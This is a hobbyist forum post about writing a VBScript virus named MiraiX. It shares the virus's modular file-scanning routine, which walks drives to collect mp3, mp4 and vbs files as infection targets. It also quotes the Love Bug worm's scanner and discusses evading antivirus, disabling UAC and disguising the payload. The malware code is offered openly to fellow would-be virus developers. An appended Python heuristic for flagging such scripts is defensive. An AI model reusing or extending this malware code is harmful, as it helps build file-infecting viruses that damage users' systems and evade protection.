As usual, a song recommendation for everyone first.
Anyway,
after the infectious VBScript I shared with you last time,
I went on extending MiraiX's other features,
including a few custom functions for scanning drives and files,
trying to finish a piece of malware with a "complete architecture" by myself.
Well, as it turned out~
I found the whole thing unexpectedly difficult~ OwO
I originally thought that
since I could write the key code for the virus part,
assembling the various features
surely couldn't be that hard,
right? Surely that's the case, right?
Bu~t~ I found that assembly is where the real difficulty lies.
How do you assemble it correctly and run each feature in stages
so as to effectively evade scanning by antivirus software (AV)?
And how do you disguise or cover the malware's main program
so that a user runs the virus without noticing?
Every one of these key techniques
was a bottleneck I ran into while assembling the virus.
Afterwards I looked up a lot of material
to study the architecture and related concepts a computer virus needs.
First, a virus can be divided architecturally into two main parts:
1. search routine (the file-scanning cycle and its design)
2. self-replication (self-copying and file infection)
The search algorithm and completeness of the search routine
affect how many files self-replication infects,
as well as the scope, speed and depth of infection the virus can reach.
The leaner the self-replication code,
the lower the probability of it being detected by AV,
but it is also then limited to infecting a single type of file,
which restricts the scope of infection.
Self-replication usually comes with anti-detection mechanisms,
including disabling/attacking antivirus software, disabling UAC, and disguise.
It's really super cool,
that completeness, it's just like a little creature.
As for the remaining details, please refer to 虛鹿 (Falsedeer)'s notes:
treat this part as an appendix,
and while I'm at it let me share MiraiX's file-scanning design,
for fellow 巴友 (Bahamut forum friends) interested in virus development to have a look at.
[#] Excerpt of MiraiX's file-scanning code:
Rem MiraiX Ver0.1.0(VBScript Ver.)
Rem Coded by Falsedeer(虛鹿) in 2022/1/27
'On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
'target file extensions for infection
Dim tgt_ext:tgt_ext = Array("mp3","mp4","vbs")
Dim runway:runway = Array() 'holds the matched target files (as path strings)
Function AddItem(arr,val) 'append val to the array and return the array
ReDim Preserve arr(UBound(arr)+1)
arr(UBound(arr)) = val 'a File/Folder object is stored via its default property, the Path string
AddItem = arr
End Function
Function scandisk(path) 'main scanning routine: walk all files/folders under path, collecting the target extensions
For Each file In scanfile(path) 'files
Dim ext
ext = fso.GetExtensionName(file)
ext = LCase(ext)
For Each y In tgt_ext
If StrComp(ext,y,1) = 0 Then
runway = AddItem(runway,file)
End If
Next
Next
For Each folder In scanfolder(path) 'subfolders, recursively
scandisk(folder)
Next
End Function
Function scanfile(folder_) 'scan the files of the given path, return an array of paths
Dim file:file = Array() 'array for the files to return
Set fhandler = fso.GetFolder(folder_)
Set files = fhandler.Files
For Each file_ In files
file = AddItem(file,file_)
Next
scanfile = file
End Function
Function scanfolder(folder_) 'scan the subfolders of the given path, return an array of paths
Dim folder:folder = Array() 'array for the subfolders to return
Set fhandler = fso.GetFolder(folder_)
Set folders = fhandler.SubFolders
For Each sub_ In folders
folder = AddItem(folder,sub_)
Next
scanfolder = folder
End Function
If you want to scan a specific drive,
you can use call scandisk("C:\")
to load the target files to be infected into the runway() array.
My original idea was to modularize each feature,
to make future reuse and rewriting of the program easier.
UMU!!
Next, let's look at the code the famous Love Bug (the VBS virus)
uses to scan files.
[#] Excerpt of the Love Bug's code:
Set fso = CreateObject("Scripting.FileSystemObject")
sub scan(folder_)
On Error Resume Next
set folder_ = fso.getfolder(folder_)
set files = folder_.files
for each file in files
ext = fso.GetExtensionName(file)
ext = lcase(ext)
if ext = "mp5" then
'~ file-infection code ~
end if
next
set subfolders = folder_.subfolders
for each subfolder in subfolders
scan(subfolder)
next
end sub
Ugh, ∑(?Д?)
It really is concise and powerful...
Is this what they call a gap in skill? QAQ
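Seen from the defender's side, the MiraiX scanner and the Love Bug scanner above share one shape: a FileSystemObject, a walk over .Files and .SubFolders, an extension check, and a write into the matched file. As an added example that is not part of the original post nor of MiraiX, here is a small Python triage routine that flags VBScript text with that combination; the rule names and the two sample scripts are constructed for the demonstration.

```python
# Added example (not MiraiX's code): heuristic triage for VBScript that has the
# search-routine + self-replication shape discussed in the post.
import re
# A single trait is common in admin scripts; the verdict comes from combining them.
RULES = [
    ("fso",        re.compile(r'CreateObject\s*\(\s*"Scripting\.FileSystemObject"', re.I)),
    ("enum_files", re.compile(r"\.Files\b", re.I)),
    ("enum_dirs",  re.compile(r"\.SubFolders\b", re.I)),
    ("ext_check",  re.compile(r"\bGetExtensionName\b", re.I)),
    ("writes",     re.compile(r"\b(CreateTextFile|OpenTextFile|CopyFile|\.Copy)\b", re.I)),
    ("script_ext", re.compile(r'"(vbs|vbe|js|wsf)"', re.I)),
    ("err_mask",   re.compile(r"\bOn\s+Error\s+Resume\s+Next\b", re.I)),
]

def triage_vbs(text):
    """Return (verdict, sorted hit names); the verdict escalates only on combinations."""
    hits = sorted(name for name, rx in RULES if rx.search(text))
    walks_tree = {"fso", "enum_files", "enum_dirs"} <= set(hits)
    if walks_tree and "ext_check" in hits and "writes" in hits:
        verdict = "self-replication-shaped"   # walk + pick by extension + write back
    elif walks_tree:
        verdict = "recursive-walk"            # backup/sync scripts land here too
    else:
        verdict = "clean"
    return verdict, hits

# Constructed sample: a one-level listing script with no writes.
BENIGN = r'''
Set fso = CreateObject("Scripting.FileSystemObject")
For Each f In fso.GetFolder("C:\Logs").Files
  WScript.Echo f.Name & " " & f.Size
Next
'''
# Constructed sample: the scanner shape from the post, with the payload left out.
SUSPECT = r'''
Set fso = CreateObject("Scripting.FileSystemObject")
Sub scan(p)
  On Error Resume Next
  For Each f In fso.GetFolder(p).Files
    If LCase(fso.GetExtensionName(f)) = "vbs" Then
      Set h = fso.OpenTextFile(f.Path, 2)
      ' ~ payload omitted ~
    End If
  Next
  For Each d In fso.GetFolder(p).SubFolders
    scan d.Path
  Next
End Sub
'''
```

Legitimate backup or sync scripts also walk a tree and copy files, so the "recursive-walk" verdict is a triage cue for a human or a sandbox run, not a detection on its own.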